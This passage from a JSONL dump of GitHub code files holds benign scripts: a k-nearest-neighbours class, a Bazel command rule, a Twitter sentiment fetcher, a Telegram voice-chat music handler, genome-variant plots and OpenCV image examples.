+{"seq_id":"7395729531","text":"import numpy as np\nimport pandas as pd\n\n\"\"\"This is an implementation of the k nearest neighbors algorithm for a classification task\n\n    Parameters:\n    train_data - numeric pandas data frame of training data\n    targets - numpy array, pandas series, or pandas dataframe\n    test_data - numeric pandas data frame of testing data\n    k - number of nearest neighbors to consider\n\n    output:\n    pandas dataframe of class predictions\n\"\"\"\n__author__ = \"Femi\"\n__version__ = \"1\"\n__status__ = \"Developing\"\n\nclass knn:\n\n\n    def __init__(self,train_data,targets,k,test_data):\n        self.data = train_data.copy()\n        self.targets = targets.copy()\n        self.k = k\n        self.assigned_class = []\n        self.test_data = test_data.copy()\n\n\n    def find_distance(self,point_1):\n        distance = np.linalg.norm(self.test_data.loc[point_1] - self.data, ord = 2, axis =1)\n        return distance\n\n    def find_nearest_neighbors(self,distances):\n        ### Flatten distances so argmin corresponds to precise index location\n        distances = distances.flatten()\n        count = 0\n        class_votes = []\n        while count < self.k:\n            min_point = np.argmin(distances)\n            distances = np.delete(distances, min_point)\n            ## Record votes\n            class_votes.append(self.targets.loc[min_point])\n            count+=1\n        self.assigned_class.append(pd.Series(class_votes).value_counts().index[0])\n\n    def predict(self):\n        for point_1 in self.test_data.index:\n            distance = self.find_distance(point_1)\n            self.find_nearest_neighbors(distance)\n        return pd.DataFrame(self.assigned_class)\n","repo_name":"oojo12/ml-algorithms","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"71977547805","text":"#!/usr/bin/env python\n\n# ale_python_test1.py\n# Author: Ben Goodrich\n#\n# This is a direct port to python of the shared library example from ALE provided in\n# doc/examples/sharedLibraryInterfaceExample.cpp\n\nimport sys\nfrom ale_python_interface import ALEInterface\nimport numpy as np\n\nif(len(sys.argv) < 2):\n  print(\"Usage ./ale_python_test1.py \")\n  sys.exit()\n\nale = ALEInterface()\n\nmax_frames_per_episode = ale.getInt(\"max_num_frames_per_episode\");\nale.set(\"random_seed\",123)\n\nrandom_seed = 
ale.getInt(\"random_seed\")\nprint(\"random_seed: \" + str(random_seed))\n\nale.loadROM(sys.argv[1])\nlegal_actions = ale.getLegalActionSet()\n\nfor episode in range(10):\n total_reward = 0.0 \n while not ale.game_over():\n a = legal_actions[np.random.randint(legal_actions.size)]\n reward = ale.act(a);\n total_reward += reward\n print(\"Episode \" + str(episode) + \" ended with score: \" + str(total_reward))\n ale.reset_game()\n\n","repo_name":"bbitmaster/ale_python_interface","sub_path":"examples/ale_python_test1.py","file_name":"ale_python_test1.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"86"} +{"seq_id":"36525623972","text":"\"\"\"\nEste es un simple juego de texto para mostrar el uso de funciones.\nEl juego se llama \"BolaDeBarro\", donde los jugadores, por turnos, se\nlanzan bolas de barro unos contra otros, hasta que alguien es alcanzado.\n\"\"\"\n \nimport math\nimport random\n \ndef imprimir_instrucciones():\n \"\"\" Esta función imprimirá las instrucciones. \"\"\"\n \n # En una declaración print, puedes usar comillas triples para\n # imprimir varias líneas.\n print(\"\"\"\nBienvenido a Bolas de Barro! El objetivo es darle al otro jugador con una bola de barro.\nIntroduce el ángulo (en grados) y la presión en PSI para cargar tu arma.\n \"\"\")\n \ndef calcular_distancia(psi, angulo_en_grados):\n \"\"\" Calcula la distancia que vuela la bola de barro. \"\"\"\n angulo_en_radianes = math.radians(angulo_en_grados)\n distancia = psi * math.sin(angulo_en_radianes) * 15\n return distancia\n \ndef obtener_datosdel_usuario(nombre):\n \"\"\" Obtiene del usuario los valores para la presión y el ángulo. Lo devuelve como una lista con dos \n números. \"\"\"\n # Más adelante, en el capítulo sobre 'excepciones', aprenderemos como\n # modificar este código para que no se cuelgue cuando el usuario escriba\n # algo que no sea un número válido.\n \n psi = float(input(nombre + \" ¿con cuántos psi cargamos el arma? \"))\n angulo = float(input(nombre + \" ¿con qué ángulo quieres apuntar el arma? \"))\n return psi, angulo\n \ndef obtener_nombres_jugadores():\n \"\"\" Obtenemos una lista con los nombres de los jugadores. \"\"\"\n print(\"Introduce los nombres de los jugadores. Puedes introducir cuantos quieras.\")\n hecho = False\n jugadores = []\n while not hecho:\n jugador = input(\"Introducir jugador (presiona intro para salir): \")\n if len(jugador) > 0:\n jugadores.append(jugador)\n else:\n hecho = True\n \n print() \n return jugadores\n \ndef procesa_turno_jugador(jugador_nombre, distancia_aparte):\n \"\"\" El código ejecuta el turno para cada jugador.\n Si devuelve False, continuamos con el juego.\n Si devuelve True, alguien ha ganado así que paramos. \"\"\"\n psi, angulo = entrada_usuario = obtener_datosdel_usuario(jugador_nombre) \n \n distancia_boladebarro = calcular_distancia(psi, angulo)\n diferencia = distancia_boladebarro - distancia_aparte\n \n # Si echamos un vistazo al capítulo de formatos de impresión, estas líneas\n # podrían imprimir números en un bonito formato.\n \n if diferencia > 1:\n print(\"Ha caído\", diferencia, \"metros muy lejos!\")\n elif diferencia < -1:\n print(\"Te has quedado\", diferencia * -1, \"metros corto!\")\n else:\n print(\"Bingo!\", jugador_nombre, \"gana!\")\n return True\n \n print()\n return False\n \ndef main():\n \"\"\" Programa Principal. 
\"\"\"\n \n # Comenzamos el juego.\n imprimir_instrucciones()\n jugador_nombres = obtener_nombres_jugadores()\n distancia_aparte = random.randrange(50, 150)\n \n # Se mantiene alerta hasta que alguien gana\n hecho = False\n while not hecho:\n # Iteramos para cada jugador\n for jugador_nombre in jugador_nombres:\n # Procesamos sus turnos\n hecho = procesa_turno_jugador(jugador_nombre, distancia_aparte)\n # Si alguien gana, 'rompemos' el bucle y finalizamos el juego.\n if hecho:\n break\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"JuanGutierrez43/RepoUNLa","sub_path":"Seminario de Lenguajes/Práctica/01.programarcadegames/Práctica25 Funciones juego.py","file_name":"Práctica25 Funciones juego.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"1653211679","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 18 10:30:26 2020\niSNV per sample peru\n@author: viro102\n\"\"\"\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os as os \n\n\n# PERU\n\n# SP032X\nos.chdir(\"/media/viro102/HD-ADU3/kte-data/sapo-ivar/test/SP032X/2_peru/\")\nrep_b = pd.read_csv(\"2_peru_final.tsv\", sep=\"\\t\")\nrep_b= rep_b[rep_b['TOTAL_DP'] >= 400]\ng = sns.lmplot( x=\"POS\", y=\"ALT_FREQ\", data=rep_b, fit_reg=False, \n hue='S_or_NS',aspect=20/8, legend=False, \n markers=[\"o\", \"x\"], scatter_kws={\"s\": 90})\n# legend title\nnew_title = 'Amino acid change'\ng._legend.set_title(new_title)\n# replace legend labels\nnew_labels = ['Synonymous', 'Non-synonymous']\nfor t, l in zip(g._legend.texts, new_labels): t.set_text(l)\n\n# resize figure box to -> put the legend out of the figure\nbox = g.ax.get_position() # get position of figure\ng.ax.set_position([box.x0, box.y0, box.width * 0.85, box.height]) # resize position\n\n# Put a legend to the right side\ng.ax.legend(loc='center right', bbox_to_anchor=(1.25, 0.5), ncol=1)\nsns.plt.show(g)\nplt.xlabel('Genome position', fontsize=15)\nplt.ylabel('iSNV frequency', fontsize=15)\nplt.title('iSNVs in sample 2_peru', fontsize=20)\nplt.grid(axis=\"both\")\nplt.show()\n\n\n\n\n\n\n# SP032X\nos.chdir(\"/media/viro102/HD-ADU3/kte-data/sapo-ivar/test/SP032X/2_peru/\")\nrep_b = pd.read_csv(\"2_peru_final.tsv\", sep=\"\\t\")\nrep_b= rep_b[rep_b['TOTAL_DP'] >= 400]\nsns.lmplot( x=\"POS\", y=\"ALT_FREQ\", data=rep_b, hue='S_or_NS', fit_reg=False)\nplt.xlabel('Genome position', fontsize=15)\nplt.ylabel('iSNV frequency', fontsize=15)\nplt.title('iSNVs in sample 2_peru', fontsize=20)\nplt.show()\n\n\n\n\n\n\n\nos.chdir(\"/media/viro102/HD-ADU3/kte-data/sapo-ivar/test/outbreak_samples/GI.1/10_japan/\")\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nrep_a = pd.read_csv(\"10_japan_GI.1_final.tsv\", sep=\"\\t\")\nrep_a[\"S_NS\"] = np.where(rep_a[\"REF_AA\"] == rep_a[\"ALT_AA\"], \"S\", \"NS\")\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nrep_b=rep_a[rep_a['TOTAL_DP'] >= 400]\nsns.lmplot( x=\"POS\", y=\"ALT_FREQ\", data=rep_b, fit_reg=False, hue='S_NS',aspect=14/5, \n legend=True, legend_out=True)\nplt.xlabel('Genome position', fontsize=15)\nplt.ylabel('iSNV frequency', fontsize=15)\nplt.title('iSNVs in sample 10_miyagi', fontsize=20)\nplt.grid(axis=\"both\")\nplt.show()\n\n","repo_name":"kagningemma/sapovirus-evolution","sub_path":"scripts/NGS data analyses and 
plots/iSNV_plots.py","file_name":"iSNV_plots.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"72303570523","text":"# https://www.codingame.com/ide/puzzle/power-of-thor-episode-1\n\nimport sys\nimport math\n\nlight_x, light_y, initial_tx, initial_ty = [int(i) for i in input().split()]\n\nthor_x, thor_y = initial_tx, initial_ty\n\n# game loop\nwhile True:\n remaining_turns = int(input()) # The remaining amount of turns Thor can move. Do not remove this line.\n\n direction_x = \"\"\n direction_y = \"\"\n\n if thor_x > light_x:\n direction_x = \"W\"\n thor_x -= 1\n if thor_x < light_x:\n direction_x = \"E\"\n thor_x += 1\n\n if thor_y > light_y:\n direction_y = \"N\"\n thor_y -= 1\n if thor_y < light_y:\n direction_y = \"S\"\n thor_y += 1\n\n\n # A single line providing the move to be made: N NE E SE S SW W or NW\n print(direction_y + direction_x)\n","repo_name":"andazale/codingame","sub_path":"python/classic_puzzles_easy/powerofthor_ep1.py","file_name":"powerofthor_ep1.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"6297415982","text":"\"\"\"\nThis is a simple rule for defining a runnable command that can be used in a\nmultirun definition\n\"\"\"\n\nload(\"@bazel_skylib//lib:shell.bzl\", \"shell\")\nload(\"//internal:constants.bzl\", \"RUNFILES_PREFIX\")\n\ndef _force_opt_impl(_settings, _attr):\n return {\"//command_line_option:compilation_mode\": \"opt\"}\n\n_force_opt = transition(\n implementation = _force_opt_impl,\n inputs = [],\n outputs = [\"//command_line_option:compilation_mode\"],\n)\n\ndef _command_impl(ctx):\n runfiles = ctx.runfiles().merge(ctx.attr._bash_runfiles[DefaultInfo].default_runfiles)\n\n for data_dep in ctx.attr.data:\n default_runfiles = data_dep[DefaultInfo].default_runfiles\n if default_runfiles != None:\n runfiles = runfiles.merge(default_runfiles)\n\n default_info = ctx.attr.command[0][DefaultInfo]\n executable = default_info.files_to_run.executable\n\n default_runfiles = default_info.default_runfiles\n if default_runfiles != None:\n runfiles = runfiles.merge(default_runfiles)\n\n expansion_targets = ctx.attr.data\n\n str_env = [\n \"export %s=%s\" % (k, shell.quote(ctx.expand_location(v, targets = expansion_targets)))\n for k, v in ctx.attr.environment.items()\n ]\n str_args = [\n \"%s\" % shell.quote(ctx.expand_location(v, targets = expansion_targets))\n for v in ctx.attr.arguments\n ]\n command_exec = \" \".join([\"exec ./%s\" % shell.quote(executable.short_path)] + str_args + ['\"$@\"\\n'])\n\n out_file = ctx.actions.declare_file(ctx.label.name + \".bash\")\n ctx.actions.write(\n output = out_file,\n content = \"\\n\".join([RUNFILES_PREFIX] + str_env + [command_exec]),\n is_executable = True,\n )\n return [\n DefaultInfo(\n files = depset([out_file]),\n runfiles = runfiles.merge(ctx.runfiles(files = ctx.files.data + [executable])),\n executable = out_file,\n ),\n ]\n\ncommand = rule(\n implementation = _command_impl,\n attrs = {\n \"arguments\": attr.string_list(\n doc = \"List of command line arguments. Subject to $(location) expansion. See https://docs.bazel.build/versions/master/skylark/lib/ctx.html#expand_location\",\n ),\n \"data\": attr.label_list(\n doc = \"The list of files needed by this command at runtime. 
See general comments about `data` at https://docs.bazel.build/versions/master/be/common-definitions.html#common-attributes\",\n allow_files = True,\n ),\n \"environment\": attr.string_dict(\n doc = \"Dictionary of environment variables. Subject to $(location) expansion. See https://docs.bazel.build/versions/master/skylark/lib/ctx.html#expand_location\",\n ),\n \"command\": attr.label(\n mandatory = True,\n allow_files = True,\n executable = True,\n doc = \"Target to run\",\n cfg = _force_opt,\n ),\n \"_bash_runfiles\": attr.label(\n default = Label(\"@bazel_tools//tools/bash/runfiles\"),\n ),\n \"_allowlist_function_transition\": attr.label(\n default = \"@bazel_tools//tools/allowlists/function_transition_allowlist\",\n ),\n },\n executable = True,\n)\n","repo_name":"aherrmann/rules_multirun","sub_path":"command.bzl","file_name":"command.bzl","file_ext":"bzl","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"86"} +{"seq_id":"29792037442","text":"\"\"\"\"\"\"\"\"\"\r\nTwitter Data Fetching Program!\r\nSave your credentials in the same folder as the program\r\nMake sure to use all the different functions I have presented!\r\nInstall all the modules below\r\nScroll down to If name statement - to enter a twitter username!\r\nBy Zain Iqbal\r\nComputer Science A level Project\r\nOriginally coded in Pycharm\r\n\r\n\"\"\"\"\"\"\"\"\"\r\n\r\n\r\n\r\nfrom tweepy import API\r\nfrom tweepy import Cursor\r\nfrom tweepy.streaming import StreamListener\r\nfrom tweepy import OAuthHandler\r\nfrom tweepy import Stream\r\n\r\nfrom textblob import TextBlob\r\n\r\nimport twitter_credentials\r\n\r\nimport numpy as np # allow us to refer to anything from the numpy library by using the dot operator\r\nimport pandas as pd\r\nimport re\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nname = (input(\"hello, please enter your name\"))\r\nprint(\"Hello\", name)\r\n\r\n#twitter credentials\r\n\r\n\r\nfrom twitter_credentials import consumer_secret, consumer_key, access_token, access_secret\r\n\r\n\r\nclass TwitterClient():\r\n\r\n def __init__(self, twitter_user=None):\r\n self.auth = TwitterAuthenticator().authenticate_twitter_app()\r\n self.twitter_client = API(self.auth)\r\n\r\n self.twitter_user = twitter_user # instaniate, allows user to specifiy a user to get timeline tweets from. 
default arguement is none, defaults to u\r\n\r\n def get_twitter_client_api(self):\r\n return self.twitter_client #new function that allows us to interface with this api and extract data from tweets\r\n\r\n\r\n\r\n def get_user_timeline_tweets(self, num_tweets): # how many tweets we want to extract or share\r\n tweets = [] # list\r\n for tweet in Cursor(self.twitter_client.user_timeline, id=self.twitter_user).items(num_tweets): # import cursor, class that allows us to get user timeline tweets\r\n tweets.append(tweet) #loop thru certain num of tweets and return to user, gets your own timeline tweets, tweets is the var stores the list\r\n return tweets\r\n\r\n\r\n def get_friend_list(self, num_friends):#determine how many friends are fetched\r\n friend_list = [] # defines list for given user ( no specification of user)\r\n for friend in Cursor(self.twitter_client.friends, id=self.twitter_user).items(num_friends): # grabs id of friends, starts a loop\r\n friend_list.append(friend) #friends\r\n return friend_list\r\n\r\n\r\n def get_home_timeline_tweets(self, num_tweets): #twitter homepage tweet fetch for given user/yourself\r\n home_timeline_tweets = [] # list\r\n for tweet in Cursor(self.twitter_client.home_timeline, id=self.twitter_user).items(num_tweets):\r\n home_timeline_tweets.append(tweet)\r\n return home_timeline_tweets\r\n\r\n\r\n #these functions all have a similar flavor as to how they work, have a look and run below in the constructor!\r\n\r\n\r\n\r\nclass TwitterAuthenticator():\r\n def authenticate_twitter_app(self):\r\n auth = OAuthHandler(consumer_key, consumer_secret) # authentication\r\n auth.set_access_token(access_token, access_secret)\r\n return auth\r\n\r\n#abstract this functionality, authenticate for other purposes, new class for authentication\r\n# allows authentication of classes\r\n\r\n\r\n\r\n#twitter streamer\r\n\r\nclass TwitterStreamer():\r\n \r\n #Class for streaming and processing live tweets (from above)\r\n \r\n def __init__(self):\r\n self.twitter_authenticator = TwitterAuthenticator()\r\n\r\n def stream_tweets(self, fetched_tweets_filename, hash_tag_list):\r\n # This handles Twitter authentication and the connection to Twitter Streaming API\r\n listener = TwitterListener(fetched_tweets_filename)\r\n auth = self.twitter_authenticator.authenticate_twitter_app()\r\n stream = Stream(auth, listener)\r\n\r\n # This line filter Twitter Streams to capture data by the keywords:\r\n stream.filter(track=hash_tag_list)\r\n\r\n\r\n\r\n\r\nclass TweetAnalyzer():\r\n \"\"\"\r\n analyzing and categorizing content from tweets.\r\n \"\"\"\r\n\r\n def clean_tweet(self, tweet):\r\n return ' '.join(re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \" \", tweet).split())\r\n # removing special characters from string and hyperlinks and returning the clean tweet\r\n\r\n def analyze_sentiment(self, tweet):#taken from textblob\r\n analysis = TextBlob(self.clean_tweet(tweet)) #object anaylsing the clean tweet\r\n\r\n if analysis.sentiment.polarity > 0: #anaylsis textblob provides, uses sentiment engine, is it pos or neg\r\n return 1 #indicates positive tweet\r\n elif analysis.sentiment.polarity == 0:\r\n return 0 #indicates neutral tweet\r\n else:\r\n return -1 #indicates the tweet is negative.\r\n\r\n\r\n\r\n\r\n\r\n def tweets_to_data_frame(self, tweets):#function that allows analysis of tweets and categorizes content from tweets\r\n df = pd.DataFrame(data=[tweet.text for tweet in tweets], columns=['tweets'])# these variables are precreated, refer to tweepy 
documentation for further info\r\n # looping through every single tweet, extract the text from the text of the tweet\r\n\r\n df['id'] = np.array([tweet.id for tweet in tweets])\r\n df['len'] = np.array([len(tweet.text) for tweet in tweets])\r\n df['date'] = np.array([tweet.created_at for tweet in tweets])\r\n df['source'] = np.array([tweet.source for tweet in tweets])\r\n df['likes'] = np.array([tweet.favorite_count for tweet in tweets])\r\n df['retweets'] = np.array([tweet.retweet_count for tweet in tweets])\r\n\r\n return df\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n twitter_client = TwitterClient()\r\n tweet_analyzer = TweetAnalyzer()\r\n\r\n api = twitter_client.get_twitter_client_api()\r\n\r\n tweets = api.user_timeline(screen_name=\"muftimenk\", count=1000000)# what user do you want to grab tweets from\r\n\r\n # print(dir(tweets[0]))\r\n # print(tweets[0].retweet_count)\r\n\r\n df = tweet_analyzer.tweets_to_data_frame(tweets) # creates dataframe based on function which is based on class\r\n df['sentiment'] = np.array([tweet_analyzer.analyze_sentiment(tweet) for tweet in df['tweets']])\r\n\r\n # Get average length over all tweets:\r\n print(\"average length of tweet from:\",np.mean(df['len']))\r\n\r\n # Get the number of likes for the most liked tweet:\r\n print(\"max likes of chosen user: \", np.max(df['likes']))\r\n\r\n # Get the number of retweets for the most retweeted tweet:\r\n print(\"max retweets of user:\" , np.max(df['retweets']))\r\n\r\nprint(df.head(10000))\r\n\"\"\"\"\"\"\"\"\"\r\n#Time Series\r\n\r\ntime_likes = pd.Series(data=df['likes'].values, index=df['date']) #created a times series object using panda, plotting user data\r\ntime_likes.plot(figsize=(16, 4), color='r')\r\nplt.show()\r\n\r\n\r\n\r\ntime_retweets = pd.Series(data=df['retweets'].values, index=df['date'])\r\ntime_retweets.plot(figsize=(16, 4), color='r')\r\nplt.show()\r\n\"\"\"\"\"\"\"\"\"\r\n\r\n\r\n #Layered Time Series - visualisation\r\n\r\ntime_likes = pd.Series(data=df['likes'].values, index=df['date'])\r\ntime_likes.plot(figsize=(14,4), label=\"likes\", legend=True) #box that shows what line corresponds to what label\r\n\r\ntime_retweets = pd.Series(data=df['retweets'].values, index=df['date']) # same thing for retweets\r\ntime_retweets.plot(figsize=(14,4), label=\"retweets\", legend=True) #plot for retweets\r\nplt.show() # see both lines together\r\n\r\n\r\n\r\n # Authenticate using config.py and connect to Twitter Streaming API.\r\n #hash_tag_list = [\"donal trump\", \"hillary clinton\", \"barack obama\", \"bernie sanders\"]\r\n #fetched_tweets_filename = \"tweets.txt\"\r\n\r\n #twitter_client = TwitterClient('pycon')# user specification, follow the @, extracts timeline tweet from another user\r\n #print(twitter_client.get_user_timeline_tweets(1)) #prints the function just created\r\n\r\n# twitter_streamer = TwitterStreamer() # method that we created above, file name and list of keywords\r\n# twitter_streamer.stream_tweets(fetched_tweets_filename, hash_tag_list)\r\n\r\n\r\n","repo_name":"zain278/Twitter-Data-Fetching-App","sub_path":"Twitter Data Fetching Program.py","file_name":"Twitter Data Fetching Program.py","file_ext":"py","file_size_in_byte":7862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"45622725037","text":"from PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\n\nfrom KdeQt import KQFileDialog\n\nfrom E4Gui.E4Completers import E4FileCompleter\n\nfrom Ui_AddProjectDialog import Ui_AddProjectDialog\n\nimport 
Utilities\n\nclass AddProjectDialog(QDialog, Ui_AddProjectDialog):\n \"\"\"\n Class implementing the add project dialog.\n \"\"\"\n def __init__(self, parent = None, startdir = None, project = None):\n \"\"\"\n Constructor\n \n @param parent parent widget of this dialog (QWidget)\n @param startdir start directory for the selection dialog (string or QString)\n @param project dictionary containing project data\n \"\"\"\n QDialog.__init__(self, parent)\n self.setupUi(self)\n \n self.fileCompleter = E4FileCompleter(self.filenameEdit)\n \n self.startdir = startdir\n \n self.__okButton = self.buttonBox.button(QDialogButtonBox.Ok)\n self.__okButton.setEnabled(False)\n \n if project is not None:\n self.setWindowTitle(self.trUtf8(\"Project Properties\"))\n \n self.filenameEdit.setReadOnly(True)\n self.fileButton.setEnabled(False)\n \n self.nameEdit.setText(project['name'])\n self.filenameEdit.setText(project['file'])\n self.descriptionEdit.setPlainText(project['description'])\n self.masterCheckBox.setChecked(project['master'])\n \n @pyqtSignature(\"\")\n def on_fileButton_clicked(self):\n \"\"\"\n Private slot to display a file selection dialog.\n \"\"\"\n startdir = self.filenameEdit.text()\n if startdir.isEmpty() and self.startdir is not None:\n startdir = self.startdir\n projectFile = KQFileDialog.getOpenFileName(\\\n self,\n self.trUtf8(\"Add Project\"),\n startdir,\n self.trUtf8(\"Project Files (*.e4p *.e4pz)\"),\n None)\n \n if not projectFile.isEmpty():\n self.filenameEdit.setText(Utilities.toNativeSeparators(projectFile))\n \n def getData(self):\n \"\"\"\n Public slot to retrieve the dialogs data.\n \n @return tuple of four values (string, string, boolean, string) giving the \n project name, the name of the project file, a flag telling, whether\n the project shall be the master project and a short description\n for the project\n \"\"\"\n return (unicode(self.nameEdit.text()), unicode(self.filenameEdit.text()), \n self.masterCheckBox.isChecked(), \n unicode(self.descriptionEdit.toPlainText()))\n \n @pyqtSignature(\"QString\")\n def on_nameEdit_textChanged(self, p0):\n \"\"\"\n Private slot called when the project name has changed.\n \"\"\"\n self.__updateUi()\n \n @pyqtSignature(\"QString\")\n def on_filenameEdit_textChanged(self, p0):\n \"\"\"\n Private slot called when the project filename has changed.\n \"\"\"\n self.__updateUi()\n \n def __updateUi(self):\n \"\"\"\n Private method to update the dialog.\n \"\"\"\n self.__okButton.setEnabled(not self.nameEdit.text().isEmpty() and \\\n not self.filenameEdit.text().isEmpty())\n","repo_name":"kunwijik/Spectroscopy_paper","sub_path":"eric4-4.5.24/eric/MultiProject/AddProjectDialog.py","file_name":"AddProjectDialog.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"74016011804","text":"from datetime import datetime\nimport pandas as pd\nfrom dateutil.relativedelta import relativedelta\n\ndef get_date_months_ago(months: int):\n today = datetime.today()\n three_months_ago = today - relativedelta(months=months)\n\n formatted_date = three_months_ago.strftime(\"%Y%m%d\")\n return formatted_date\n\ndef get_corporate_code(corp_name: str):\n file_path = \"/config/workspace/ChatGPT-plugin-test/plugin/dart/corpcode.json\"\n with pd.read_json(file_path, lines=True, chunksize=300) as reader:\n for idx, chunk in enumerate(reader):\n ret = chunk.loc[chunk['corp_name'] == corp_name, \"corp_code\"]\n if ret.empty:\n continue\n corp_code = ret.item()\n 
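# (Editor's note) DART corp codes are fixed-width 8-digit strings; pandas reads
# the corp_code column as an integer and drops leading zeros, so the rjust on
# the next line restores them, e.g. 126380 -> '00126380'; str(corp_code).zfill(8)
# would be an equivalent spelling of the same zero-padding.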
return str(corp_code).rjust(8, '0') \n return None\n\ndef etree_to_text_list(t):\n text_list = []\n if t.text:\n text = t.text.strip()\n if text:\n text_list.append(text)\n for child in t:\n text_list.extend(etree_to_text_list(child))\n return text_list\n\ndef convert_etree_to_text(etree_obj):\n text_list = etree_to_text_list(etree_obj)\n return \" \".join(text_list)","repo_name":"sehwan505/DART-ChatGPT-PLUGIN","sub_path":"plugin/dart/dart_util.py","file_name":"dart_util.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"39275328523","text":"import os\nimport asyncio\nfrom pyrogram import Client\nfrom AsadAlexaVCBot.queues import QUEUE, add_to_queue\nfrom config import bot, call_py, HNDLR, contact_filter, GRPPLAY\nfrom pyrogram import filters\nfrom pyrogram.types import Message\nfrom pytgcalls import StreamType\nfrom pytgcalls.types.input_stream import AudioPiped\nfrom pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup, Message\n\n\n@Client.on_message(filters.command([\"playfrom\"], prefixes=f\"{HNDLR}\"))\nasync def playfrom(client, m: Message):\n if GRPPLAY or (m.from_user and m.from_user.is_contact) or m.outgoing:\n chat_id = m.chat.id\n if len(m.command) < 2:\n await m.reply(\n \"**USAGE:** \\n\\n`/playfrom [chat_id/username]` \\n`/playfrom [chat_id/username] ; [no. of songs]`\"\n )\n else:\n args = m.text.split(maxsplit=1)[1]\n if \";\" in args:\n chat = args.split(\";\")[0]\n limit = int(args.split(\";\")[1])\n else:\n chat = args\n limit = 10\n hmm = await m.reply(f\"Searching the last **{limit}** Songs from `{chat}`\")\n try:\n async for x in bot.search_messages(chat, limit=limit, filter=\"audio\"):\n location = await x.download()\n if x.audio.title:\n songname = x.audio.title[:30] + \"...\"\n else:\n if x.audio.file_name:\n songname = x.audio.file_name[:30] + \"...\"\n else:\n songname = \"Audio\"\n link = x.link\n if chat_id in QUEUE:\n add_to_queue(chat_id, songname, location, link, \"Audio\", 0)\n else:\n await call_py.join_group_call(\n chat_id,\n AudioPiped(location),\n stream_type=StreamType().pulse_stream,\n )\n add_to_queue(chat_id, songname, location, link, \"Audio\", 0)\n await m.reply(\n f\"**Started Playing Songs from {chat} â–¶** \\n**🎧 SONG** : [{songname}]({link}) \\n**💬 CHAT** : `{chat_id}`\",\n disable_web_page_preview=True,\n )\n await hmm.delete()\n await m.reply(f\"Added **{limit}** SONGS to Queue\")\n except Exception as e:\n await hmm.edit(f\"**ERROR** \\n`{e}`\")\n","repo_name":"TheTeamAlexa/AlexaMusic-Userbot","sub_path":"AsadAlexaVCBot/playfrom.py","file_name":"playfrom.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"86"} +{"seq_id":"71293082204","text":"# 0. Loading libraries\nimport cv2 as cv # Import python-supported OpenCV functions.\n#import matplotlib.pylab as plt # Import matplotlib.\nimport numpy as np # Import numpy.\n#from skimage import io\n###############################################################################\n# 1. Read and show an image\n# This is how you define a function. You don't need to define the type of the\n# parameters, just write them, the python compiler will find out automatically\n# their type.\ndef example_1():\n # Python list style.\n images = [\n # Loads the image from the given path with its default colors. 
I think that\n # without option and using IMREAD_COLOR has the same result.\n cv.imread('cook.jpg'),\n # cv.imread('cook.jpg', cv.IMREAD_COLOR),\n # Loads the image from the given path with grayscale colors.\n cv.imread('cook.jpg', cv.IMREAD_GRAYSCALE)\n ]\n cv.namedWindow('Example 1', cv.WINDOW_AUTOSIZE)\n # For-loop: loop through each element of images saving the value of\n # each iteration in img:\n for img in images:\n # Shows the image.\n cv.imshow('Example 1', img)\n # Shows the object type of the image. The fstrings (f'...') have the same\n # behavior as echo \"$var\", but instead of $var or ${var}, is {var}.\n print(f'Type: {type(img)}')\n # Shows the dimensions (Width, Height, Channels) of the image.\n print(f'Dimensions: {img.shape}') \n if cv.waitKey(0) == 27:\n break\n cv.destroyWindow('Example 1') # cv2.destroyAllWindows()\n\n# example_1()\n###############################################################################\n# 2. Import and show an image. Not working, needs skimage, and the installation\n# gives an error.\n#def example_2():\n # Loads image from a given url. The image is read in BGR format:\n #image = io.imread('https://i.kym-cdn.com/photos/images/newsfeed/002/488/664/964.jpg')\n # Shows the image:\n # - With cvtColor, converts the image from BGR to RGB (option COLOR_BGR2RGB).\n # - With hconcat, puts both images next to each other horizontally.\n #cv.namedWindow('Example 2', cv.WINDOW_AUTOSIZE)\n #cv.imshow('Example 2', cv.hconcat((image, cv.cvtColor(image, cv.COLOR_BGR2RGB))))\n # Shows the object type of the image.\n #print(f'Type: {type(image)}')\n # Shows the dimensions (Width, Height, Channels) of the image.\n #print(f'Dimensions: {image.shape}')\n # Waits until any key is pressed.\n #cv.waitKey(0)\n # Destroys the window.\n #cv.destroyWindow('Example 1') # cv2.destroyAllWindows()\n\n# example_2()\n###############################################################################\n# 3. Images are matrices:\ndef imshow_properties(img, window):\n # Shows the image.\n cv.imshow(window, img)\n print('Properties of an image matrix:')\n # Shows the object type of the image.\n print(f'Type: {type(img)}')\n # Shows the dimensions (Width, Height, Channels) of the image.\n print(f'Dimensions (width, height, channels): {img.shape}')\n # Shows the number of pixels.\n print(f'Number of pixels: {img.size}')\n # 